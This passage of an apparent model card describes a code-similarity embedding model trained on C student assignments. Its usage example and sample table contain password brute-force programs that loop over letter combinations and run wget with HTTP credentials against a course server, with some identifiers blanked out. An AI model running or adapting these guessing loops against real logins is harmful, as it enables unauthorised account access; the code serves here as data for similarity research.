'#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={\'a\',\'A\',\'b\',\'B\',\'c\',\'C\',\'d\',\'D\',\'e\',\'E\',\'f\',\'F\',\'g\',\'G\',\'h\',\'H\',\'i\',\'I\',\'j\',\'J\',\'k\',\'K\',\'l\',\'L\',\'m\',\'M\',\'n\',\'N\',\'o\',\'O\',\'p\',\'P\',\'q\',\'Q\',\'r\',\'R\',\'s\',\'S\',\'t\',\'T\',\'u\',\'U\',\'v\',\'V\',\'w\',\'W\',\'x\',\'X\',\'y\',\'Y\',\'z\',\'Z\'};\ntime_t u1,u2;\n\n (void) time(&u1); \n strcpy(temp1,"wget --http-user= --http-passwd=");\n strcpy(temp2," http://sec-crack.cs.rmit.edu./SEC/2/index.php");\n \n for(m=0;m<=51;m++)\n {\n v[0]=[m]; \n v[1]=\'\\0\';\n v[2]=\'\\0\';\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3); \n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n for(n=0;n<=51;n++)\n {\n v[0]=[m]; \n v[1]=[n];\n v[2]=\'\\0\';\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n for(o=0;o<=51;o++)\n { \n v[0]=[m]; \n v[1]=[n];\n v[2]=[o];\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n \n \n }\n }\n } \n \n} \n',
|
498 |
+
]
|
499 |
+
embeddings = model.encode(sentences)
|
500 |
+
print(embeddings.shape)
|
501 |
+
# [3, 768]
|
502 |
+
|
503 |
+
# Get the similarity scores for the embeddings
|
504 |
+
similarities = model.similarity(embeddings, embeddings)
|
505 |
+
print(similarities)
|
506 |
+
# tensor([[1.0000, 0.9111, 0.9288],
|
507 |
+
# [0.9111, 1.0000, 0.9562],
|
508 |
+
# [0.9288, 0.9562, 1.0000]])
|
509 |
+
```
|
510 |
+
|
511 |
+
<!--
|
512 |
+
### Direct Usage (Transformers)
|
513 |
+
|
514 |
+
<details><summary>Click to see the direct usage in Transformers</summary>
|
515 |
+
|
516 |
+
</details>
|
517 |
+
-->
|
518 |
+
|
519 |
+
<!--
|
520 |
+
### Downstream Usage (Sentence Transformers)
|
521 |
+
|
522 |
+
You can finetune this model on your own dataset.
|
523 |
+
|
524 |
+
<details><summary>Click to expand</summary>
|
525 |
+
|
526 |
+
</details>
|
527 |
+
-->
|
528 |
+
|
529 |
+
<!--
|
530 |
+
### Out-of-Scope Use
|
531 |
+
|
532 |
+
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
|
533 |
+
-->
|
534 |
+
|
535 |
+
<!--
|
536 |
+
## Bias, Risks and Limitations
|
537 |
+
|
538 |
+
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
|
539 |
+
-->
|
540 |
+
|
541 |
+
<!--
|
542 |
+
### Recommendations
|
543 |
+
|
544 |
+
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
|
545 |
+
-->
|
546 |
+
|
547 |
+
## Training Details
|
548 |
+
|
549 |
+
### Training Dataset
|
550 |
+
|
551 |
+
#### Unnamed Dataset
|
552 |
+
|
553 |
+
* Size: 3,081 training samples
|
554 |
+
* Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
|
555 |
+
* Approximate statistics based on the first 1000 samples:
|
556 |
+
| | sentence_0 | sentence_1 | label |
|
557 |
+
|:--------|:--------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------|:-----------------------------------------------|
|
558 |
+
| type | string | string | int |
|
559 |
+
| details | <ul><li>min: 177 tokens</li><li>mean: 436.43 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 177 tokens</li><li>mean: 421.53 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.20%</li><li>1: ~0.80%</li></ul> |
|
560 |
+
* Samples:
|
561 |
+
| sentence_0 | sentence_1 | label |
|
562 |
+
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------|
|
563 |
+
| <code><br><br><br><br><br><br>#include <sys/stat.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/time.h><br><br>#define MSG_FILE "msg"<br>#define EMAIL_TO "@cs.rmit.edu."<br>#define TRUE 1<br>#define FALSE 0<br><br><br>void genLog(char *logFile, const char *URL);<br>void getPage(const char *URL, const char *fname);<br>int getCurTime();<br>int logDiff(const char *logFile, int time);<br>int isFileExist(const char *fname);<br>void sendMail(const char* emailTo, const char* subject, const char* msgFile<br> , const char* log);<br><br>int (int argc, char **argv)<br>{<br> int time_var;<br> char *URL;<br> int upTime = 0;<br> char logFile[256];<br> int logSent = FALSE;<br> char subject[256];<br> <br> if (argc != 3)<br> {<br> fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");<br> exit(1);<br> }<br> else<br> {<br> time_var = atoi(argv[2]);<br><br> URL = malloc(strlen(argv[1]));<br><br> if (URL)<br> {<br> for (;;) <br> {<br> if (((int)difftime(upTime, getCurTime()) % time_var == 0) <br> && !logSent)<br> {<br> strncpy(URL, argv[1], strlen(argv[1]));<br> genLog(logFile, URL);<br> ...</code> | <code>#include <string.h><br>#include <stdlib.h><br>#include <stdio.h><br>#include <fcntl.h><br>#include <unistd.h><br>#include <sys/wait.h><br>#include <sys/time.h><br><br><br><br>char* joinMe(char* t, char* t2)<br>{<br> char* result;<br> int length = 0;<br> int j = 0;<br> int counter = 0;<br> <br> length = strlen(t) + strlen(t2) + 1;<br> <br> result = malloc(sizeof(char) * length);<br> <br> <br> for(j = 0; j<strlen(t); j++)<br> {<br> result[j] = t[j];<br> }<br><br> <br> for(j = strlen(t); j<length; j++)<br> {<br> result[j] = t2[counter];<br> counter++;<br> }<br> <br> <br> result[length-1] = '\0';<br><br> return result;<br>}<br><br><br>void check(char** smallcmd)<br>{<br> int pid = 0;<br> int status;<br><br> <br> if( (pid = fork()) == 0)<br> {<br> <br> execvp(smallcmd[0],smallcmd);<br> }<br> else<br> {<br> <br> while(wait(&status) != pid);<br> }<br>}<br><br>int (void)<br>{<br> int i = 0, j = 0, k = 0;<br> char** smallcmd;<br> int count = 0;<br> FILE *myFile,*myFile2,*myFile3;<br> int compare1;<br> char* myString;<br> int length = 0;<br> int start1, end1;<br> <br> <br> myString = malloc(sizeof(char) * 100);<br> smallcmd = malloc(sizeof(char *) * 8);<br> <br> smallcmd[0] = "/usr/local//wget";<br> <br> smallcm...</code> | <code>0</code> |
|
564 |
+
| <code><br><br><br><br><br><br>#include <sys/stat.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/time.h><br><br>#define MSG_FILE "msg"<br>#define EMAIL_TO "@cs.rmit.edu."<br>#define TRUE 1<br>#define FALSE 0<br><br><br>void genLog(char *logFile, const char *URL);<br>void getPage(const char *URL, const char *fname);<br>int getCurTime();<br>int logDiff(const char *logFile, int time);<br>int isFileExist(const char *fname);<br>void sendMail(const char* emailTo, const char* subject, const char* msgFile<br> , const char* log);<br><br>int (int argc, char **argv)<br>{<br> int time_var;<br> char *URL;<br> int upTime = 0;<br> char logFile[256];<br> int logSent = FALSE;<br> char subject[256];<br> <br> if (argc != 3)<br> {<br> fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");<br> exit(1);<br> }<br> else<br> {<br> time_var = atoi(argv[2]);<br><br> URL = malloc(strlen(argv[1]));<br><br> if (URL)<br> {<br> for (;;) <br> {<br> if (((int)difftime(upTime, getCurTime()) % time_var == 0) <br> && !logSent)<br> {<br> strncpy(URL, argv[1], strlen(argv[1]));<br> genLog(logFile, URL);<br> ...</code> | <code>#include<stdio.h><br>#include<stdlib.h><br>#include <sys/types.h><br>#include <unistd.h><br>#include <sys/time.h><br><br>int ()<br>{<br> char lc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> char uc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> char gc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> int a=0,b=0,c=0,d,e,count=0;<br> char [100],temp1[100],temp2[100],temp3[100],temp4[10],temp5[50],p[100],q[50],r[50];<br> char result,result1,result2,mx[100],mx1,mx2,mx3,mx4;<br> <br> int ,end,t;<br> = time(); <br>while(sizeof(lc)!=52)<br>{<br> temp2[0]=lc[d];<br> temp2[1]='\0';<br> d=d+1;<br> strcpy(p,temp2);<br> <br> while(sizeof(uc)!=52)<br> {<br> temp3[0]=uc[b];<br> temp3[1]='\0';<br> b=b+1;<br> strcpy(q,p);<br> strcat(q,temp3);<br> for(e=0;e<52;e++)<br> {<br> temp1[0]=gc[e];<br> temp1[1]='\0';<br> strcpy(r,q);<br> strcat(r,temp1);<br> strcpy(mx,"wget http://sec-crack.cs.rmit.edu./SEC/2 --http-user= --http-passwd=");<br> strcat(mx,r);<br> printf("temp3=%s\n",mx);<br> if(sy...</code> | <code>0</code> |
|
565 |
+
| <code>#include<stdio.h><br>#include<stdlib.h><br>#include<unistd.h><br>#define TRUE 0<br>()<br>{<br>FILE *fp;<br>system("rmdir ./www.cs.rmit.edu.");<br>char chk[1];<br>strcpy(chk,"n");<br> while(1)<br> {<br> <br> system("wget -p http://www.cs.rmit.edu./students/");<br> <br> system("md5sum ./www.cs.rmit.edu./images/*.* > ./www.cs.rmit.edu./text1.txt");<br> <br> <br> if (strcmp(chk,"n")==0) <br> { <br> system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt");<br> system("mkdir ./");<br> <br> system("mv ./www.cs.rmit.edu./students/index.html ./");<br> }<br> else<br> {<br> <br> <br> system(" diff ./www.cs.rmit.edu./students/index.html .//index.html | mail @cs.rmit.edu. ");<br> system(" diff ./www.cs.rmit.edu./text1.txt ./text2.txt | mail @cs.rmit.edu. ");<br> system("mv ./www.cs.rmit.edu./students/index.html ./");<br> system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt"); <br> }<br> sleep(86400);<br> strcpy(chk,"y");<br> <br> }<br>} <br> <br> <br></code> | <code>#include <string.h><br>#include <stdlib.h><br>#include <stdio.h><br>#include <fcntl.h><br>#include <unistd.h><br>#include <sys/wait.h><br>#include <sys/time.h><br><br><br><br>void emptyFile(char* name)<br>{<br> FILE* myFile;<br> myFile = fopen(name,"w");<br> fclose(myFile);<br>}<br><br>int (void)<br>{<br> FILE* myFile;<br> char* myString;<br> <br> myString = malloc(sizeof(char ) * 100);<br><br> <br> <br> emptyFile(".old.html");<br> emptyFile(".new.html");<br><br> <br> system("wget -O .old.html -q http://www.cs.rmit.edu./students/");<br><br> while(1)<br> {<br> <br> emptyFile(".new.html");<br><br> <br> system("wget -O .new.html -q http://www.cs.rmit.edu./students/");<br> <br> <br> system("diff .old.html .new.html > watch.txt");<br><br> myFile = fopen("watch.txt","r");<br> if(myFile != (FILE*) NULL)<br> {<br> fgets(myString,100,myFile);<br> if(strlen(myString) > 0)<br> {<br> <br> <br> system("mail @cs.rmit.edu. < watch.txt");<br> <br> system("cp .new.html .old.html");<br> }<br> }<br> <br> sleep(60*60*24);<br> }<br> <br> return 1;<br>}<br><br><br></code> | <code>0</code> |
|
566 |
+
* Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss)
|
567 |
+
|
568 |
+
### Training Hyperparameters
|
569 |
+
#### Non-Default Hyperparameters
|
570 |
+
|
571 |
+
- `per_device_train_batch_size`: 16
|
572 |
+
- `per_device_eval_batch_size`: 16
|
573 |
+
- `num_train_epochs`: 1
|
574 |
+
- `fp16`: True
|
575 |
+
- `multi_dataset_batch_sampler`: round_robin
|
576 |
+
|
577 |
+
#### All Hyperparameters
|
578 |
+
<details><summary>Click to expand</summary>
|
579 |
+
|
580 |
+
- `overwrite_output_dir`: False
|
581 |
+
- `do_predict`: False
|
582 |
+
- `eval_strategy`: no
|
583 |
+
- `prediction_loss_only`: True
|
584 |
+
- `per_device_train_batch_size`: 16
|
585 |
+
- `per_device_eval_batch_size`: 16
|
586 |
+
- `per_gpu_train_batch_size`: None
|
587 |
+
- `per_gpu_eval_batch_size`: None
|
588 |
+
- `gradient_accumulation_steps`: 1
|
589 |
+
- `eval_accumulation_steps`: None
|
590 |
+
- `torch_empty_cache_steps`: None
|
591 |
+
- `learning_rate`: 5e-05
|
592 |
+
- `weight_decay`: 0.0
|
593 |
+
- `adam_beta1`: 0.9
|
594 |
+
- `adam_beta2`: 0.999
|
595 |
+
- `adam_epsilon`: 1e-08
|
596 |
+
- `max_grad_norm`: 1
|
597 |
+
- `num_train_epochs`: 1
|
598 |
+
- `max_steps`: -1
|
599 |
+
- `lr_scheduler_type`: linear
|
600 |
+
- `lr_scheduler_kwargs`: {}
|
601 |
+
- `warmup_ratio`: 0.0
|
602 |
+
- `warmup_steps`: 0
|
603 |
+
- `log_level`: passive
|
604 |
+
- `log_level_replica`: warning
|
605 |
+
- `log_on_each_node`: True
|
606 |
+
- `logging_nan_inf_filter`: True
|
607 |
+
- `save_safetensors`: True
|
608 |
+
- `save_on_each_node`: False
|
609 |
+
- `save_only_model`: False
|
610 |
+
- `restore_callback_states_from_checkpoint`: False
|
611 |
+
- `no_cuda`: False
|
612 |
+
- `use_cpu`: False
|
613 |
+
- `use_mps_device`: False
|
614 |
+
- `seed`: 42
|
615 |
+
- `data_seed`: None
|
616 |
+
- `jit_mode_eval`: False
|
617 |
+
- `use_ipex`: False
|
618 |
+
- `bf16`: False
|
619 |
+
- `fp16`: True
|
620 |
+
- `fp16_opt_level`: O1
|
621 |
+
- `half_precision_backend`: auto
|
622 |
+
- `bf16_full_eval`: False
|
623 |
+
- `fp16_full_eval`: False
|
624 |
+
- `tf32`: None
|
625 |
+
- `local_rank`: 0
|
626 |
+
- `ddp_backend`: None
|
627 |
+
- `tpu_num_cores`: None
|
628 |
+
- `tpu_metrics_debug`: False
|
629 |
+
- `debug`: []
|
630 |
+
- `dataloader_drop_last`: False
|
631 |
+
- `dataloader_num_workers`: 0
|
632 |
+
- `dataloader_prefetch_factor`: None
|
633 |
+
- `past_index`: -1
|
634 |
+
- `disable_tqdm`: False
|
635 |
+
- `remove_unused_columns`: True
|
636 |
+
- `label_names`: None
|
637 |
+
- `load_best_model_at_end`: False
|
638 |
+
- `ignore_data_skip`: False
|
639 |
+
- `fsdp`: []
|
640 |
+
- `fsdp_min_num_params`: 0
|
641 |
+
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
|
642 |
+
- `fsdp_transformer_layer_cls_to_wrap`: None
|
643 |
+
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
|
644 |
+
- `deepspeed`: None
|
645 |
+
- `label_smoothing_factor`: 0.0
|
646 |
+
- `optim`: adamw_torch
|
647 |
+
- `optim_args`: None
|
648 |
+
- `adafactor`: False
|
649 |
+
- `group_by_length`: False
|
650 |
+
- `length_column_name`: length
|
651 |
+
- `ddp_find_unused_parameters`: None
|
652 |
+
- `ddp_bucket_cap_mb`: None
|
653 |
+
- `ddp_broadcast_buffers`: False
|
654 |
+
- `dataloader_pin_memory`: True
|
655 |
+
- `dataloader_persistent_workers`: False
|
656 |
+
- `skip_memory_metrics`: True
|
657 |
+
- `use_legacy_prediction_loop`: False
|
658 |
+
- `push_to_hub`: False
|
659 |
+
- `resume_from_checkpoint`: None
|
660 |
+
- `hub_model_id`: None
|
661 |
+
- `hub_strategy`: every_save
|
662 |
+
- `hub_private_repo`: None
|
663 |
+
- `hub_always_push`: False
|
664 |
+
- `gradient_checkpointing`: False
|
665 |
+
- `gradient_checkpointing_kwargs`: None
|
666 |
+
- `include_inputs_for_metrics`: False
|
667 |
+
- `include_for_metrics`: []
|
668 |
+
- `eval_do_concat_batches`: True
|
669 |
+
- `fp16_backend`: auto
|
670 |
+
- `push_to_hub_model_id`: None
|
671 |
+
- `push_to_hub_organization`: None
|
672 |
+
- `mp_parameters`:
|
673 |
+
- `auto_find_batch_size`: False
|
674 |
+
- `full_determinism`: False
|
675 |
+
- `torchdynamo`: None
|
676 |
+
- `ray_scope`: last
|
677 |
+
- `ddp_timeout`: 1800
|
678 |
+
- `torch_compile`: False
|
679 |
+
- `torch_compile_backend`: None
|
680 |
+
- `torch_compile_mode`: None
|
681 |
+
- `include_tokens_per_second`: False
|
682 |
+
- `include_num_input_tokens_seen`: False
|
683 |
+
- `neftune_noise_alpha`: None
|
684 |
+
- `optim_target_modules`: None
|
685 |
+
- `batch_eval_metrics`: False
|
686 |
+
- `eval_on_start`: False
|
687 |
+
- `use_liger_kernel`: False
|
688 |
+
- `eval_use_gather_object`: False
|
689 |
+
- `average_tokens_across_devices`: False
|
690 |
+
- `prompts`: None
|
691 |
+
- `batch_sampler`: batch_sampler
|
692 |
+
- `multi_dataset_batch_sampler`: round_robin
|
693 |
+
- `router_mapping`: {}
|
694 |
+
- `learning_rate_mapping`: {}
|
695 |
+
|
696 |
+
</details>
|
697 |
+
|
698 |
+
### Framework Versions
|
699 |
+
- Python: 3.11.13
|
700 |
+
- Sentence Transformers: 5.0.0
|
701 |
+
- Transformers: 4.52.4
|
702 |
+
- PyTorch: 2.6.0+cu124
|
703 |
+
- Accelerate: 1.8.1
|
704 |
+
- Datasets: 3.6.0
|
705 |
+
- Tokenizers: 0.21.2
|
706 |
+
|
707 |
+
## Citation
|
708 |
+
|
709 |
+
### BibTeX
|
710 |
+
|
711 |
+
#### Sentence Transformers
|
712 |
+
```bibtex
|
713 |
+
@inproceedings{reimers-2019-sentence-bert,
|
714 |
+
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
|
715 |
+
author = "Reimers, Nils and Gurevych, Iryna",
|
716 |
+
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
|
717 |
+
month = "11",
|
718 |
+
year = "2019",
|
719 |
+
publisher = "Association for Computational Linguistics",
|
720 |
+
url = "https://arxiv.org/abs/1908.10084",
|
721 |
+
}
|
722 |
+
```
|
723 |
+
|
724 |
+
#### BatchAllTripletLoss
|
725 |
+
```bibtex
|
726 |
+
@misc{hermans2017defense,
|
727 |
+
title={In Defense of the Triplet Loss for Person Re-Identification},
|
728 |
+
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
|
729 |
+
year={2017},
|
730 |
+
eprint={1703.07737},
|
731 |
+
archivePrefix={arXiv},
|
732 |
+
primaryClass={cs.CV}
|
733 |
+
}
|
734 |
+
```
|
735 |
+
|
736 |
+
<!--
|
737 |
+
## Glossary
|
738 |
+
|
739 |
+
*Clearly define terms in order to be accessible across audiences.*
|
740 |
+
-->
|
741 |
+
|
742 |
+
<!--
|
743 |
+
## Model Card Authors
|
744 |
+
|
745 |
+
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
|
746 |
+
-->
|
747 |
+
|
748 |
+
<!--
|
749 |
+
## Model Card Contact
|
750 |
+
|
751 |
+
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
|
752 |
+
-->
|
config.json
ADDED
@@ -0,0 +1,28 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"architectures": [
|
3 |
+
"RobertaModel"
|
4 |
+
],
|
5 |
+
"attention_probs_dropout_prob": 0.1,
|
6 |
+
"bos_token_id": 0,
|
7 |
+
"classifier_dropout": null,
|
8 |
+
"eos_token_id": 2,
|
9 |
+
"gradient_checkpointing": false,
|
10 |
+
"hidden_act": "gelu",
|
11 |
+
"hidden_dropout_prob": 0.1,
|
12 |
+
"hidden_size": 768,
|
13 |
+
"initializer_range": 0.02,
|
14 |
+
"intermediate_size": 3072,
|
15 |
+
"layer_norm_eps": 1e-05,
|
16 |
+
"max_position_embeddings": 1026,
|
17 |
+
"model_type": "roberta",
|
18 |
+
"num_attention_heads": 12,
|
19 |
+
"num_hidden_layers": 12,
|
20 |
+
"output_past": true,
|
21 |
+
"pad_token_id": 1,
|
22 |
+
"position_embedding_type": "absolute",
|
23 |
+
"torch_dtype": "float32",
|
24 |
+
"transformers_version": "4.52.4",
|
25 |
+
"type_vocab_size": 10,
|
26 |
+
"use_cache": true,
|
27 |
+
"vocab_size": 50000
|
28 |
+
}
|
config_sentence_transformers.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"model_type": "SentenceTransformer",
|
3 |
+
"__version__": {
|
4 |
+
"sentence_transformers": "5.0.0",
|
5 |
+
"transformers": "4.52.4",
|
6 |
+
"pytorch": "2.6.0+cu124"
|
7 |
+
},
|
8 |
+
"prompts": {
|
9 |
+
"query": "",
|
10 |
+
"document": ""
|
11 |
+
},
|
12 |
+
"default_prompt_name": null,
|
13 |
+
"similarity_fn_name": "cosine"
|
14 |
+
}
|
merges.txt
ADDED
The diff for this file is too large to render.
See raw diff
|
|
model.safetensors
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:be7b8d948e440cb3335c05d316cf60f9173091cc1ce881990453f763299bcf06
|
3 |
+
size 499391344
|
modules.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
[
|
2 |
+
{
|
3 |
+
"idx": 0,
|
4 |
+
"name": "0",
|
5 |
+
"path": "",
|
6 |
+
"type": "sentence_transformers.models.Transformer"
|
7 |
+
},
|
8 |
+
{
|
9 |
+
"idx": 1,
|
10 |
+
"name": "1",
|
11 |
+
"path": "1_Pooling",
|
12 |
+
"type": "sentence_transformers.models.Pooling"
|
13 |
+
}
|
14 |
+
]
|
sentence_bert_config.json
ADDED
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"max_seq_length": 512,
|
3 |
+
"do_lower_case": false
|
4 |
+
}
|
special_tokens_map.json
ADDED
@@ -0,0 +1,51 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"bos_token": {
|
3 |
+
"content": "<s>",
|
4 |
+
"lstrip": false,
|
5 |
+
"normalized": true,
|
6 |
+
"rstrip": false,
|
7 |
+
"single_word": false
|
8 |
+
},
|
9 |
+
"cls_token": {
|
10 |
+
"content": "<s>",
|
11 |
+
"lstrip": false,
|
12 |
+
"normalized": true,
|
13 |
+
"rstrip": false,
|
14 |
+
"single_word": false
|
15 |
+
},
|
16 |
+
"eos_token": {
|
17 |
+
"content": "</s>",
|
18 |
+
"lstrip": false,
|
19 |
+
"normalized": true,
|
20 |
+
"rstrip": false,
|
21 |
+
"single_word": false
|
22 |
+
},
|
23 |
+
"mask_token": {
|
24 |
+
"content": "<mask>",
|
25 |
+
"lstrip": true,
|
26 |
+
"normalized": true,
|
27 |
+
"rstrip": false,
|
28 |
+
"single_word": false
|
29 |
+
},
|
30 |
+
"pad_token": {
|
31 |
+
"content": "<pad>",
|
32 |
+
"lstrip": false,
|
33 |
+
"normalized": true,
|
34 |
+
"rstrip": false,
|
35 |
+
"single_word": false
|
36 |
+
},
|
37 |
+
"sep_token": {
|
38 |
+
"content": "</s>",
|
39 |
+
"lstrip": false,
|
40 |
+
"normalized": true,
|
41 |
+
"rstrip": false,
|
42 |
+
"single_word": false
|
43 |
+
},
|
44 |
+
"unk_token": {
|
45 |
+
"content": "<unk>",
|
46 |
+
"lstrip": false,
|
47 |
+
"normalized": true,
|
48 |
+
"rstrip": false,
|
49 |
+
"single_word": false
|
50 |
+
}
|
51 |
+
}
|
tokenizer.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|
tokenizer_config.json
ADDED
@@ -0,0 +1,58 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"add_prefix_space": false,
|
3 |
+
"added_tokens_decoder": {
|
4 |
+
"0": {
|
5 |
+
"content": "<s>",
|
6 |
+
"lstrip": false,
|
7 |
+
"normalized": true,
|
8 |
+
"rstrip": false,
|
9 |
+
"single_word": false,
|
10 |
+
"special": true
|
11 |
+
},
|
12 |
+
"1": {
|
13 |
+
"content": "<pad>",
|
14 |
+
"lstrip": false,
|
15 |
+
"normalized": true,
|
16 |
+
"rstrip": false,
|
17 |
+
"single_word": false,
|
18 |
+
"special": true
|
19 |
+
},
|
20 |
+
"2": {
|
21 |
+
"content": "</s>",
|
22 |
+
"lstrip": false,
|
23 |
+
"normalized": true,
|
24 |
+
"rstrip": false,
|
25 |
+
"single_word": false,
|
26 |
+
"special": true
|
27 |
+
},
|
28 |
+
"3": {
|
29 |
+
"content": "<unk>",
|
30 |
+
"lstrip": false,
|
31 |
+
"normalized": true,
|
32 |
+
"rstrip": false,
|
33 |
+
"single_word": false,
|
34 |
+
"special": true
|
35 |
+
},
|
36 |
+
"4": {
|
37 |
+
"content": "<mask>",
|
38 |
+
"lstrip": true,
|
39 |
+
"normalized": true,
|
40 |
+
"rstrip": false,
|
41 |
+
"single_word": false,
|
42 |
+
"special": true
|
43 |
+
}
|
44 |
+
},
|
45 |
+
"bos_token": "<s>",
|
46 |
+
"clean_up_tokenization_spaces": false,
|
47 |
+
"cls_token": "<s>",
|
48 |
+
"eos_token": "</s>",
|
49 |
+
"errors": "replace",
|
50 |
+
"extra_special_tokens": {},
|
51 |
+
"mask_token": "<mask>",
|
52 |
+
"model_max_length": 512,
|
53 |
+
"pad_token": "<pad>",
|
54 |
+
"sep_token": "</s>",
|
55 |
+
"tokenizer_class": "RobertaTokenizer",
|
56 |
+
"trim_offsets": true,
|
57 |
+
"unk_token": "<unk>"
|
58 |
+
}
|
vocab.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|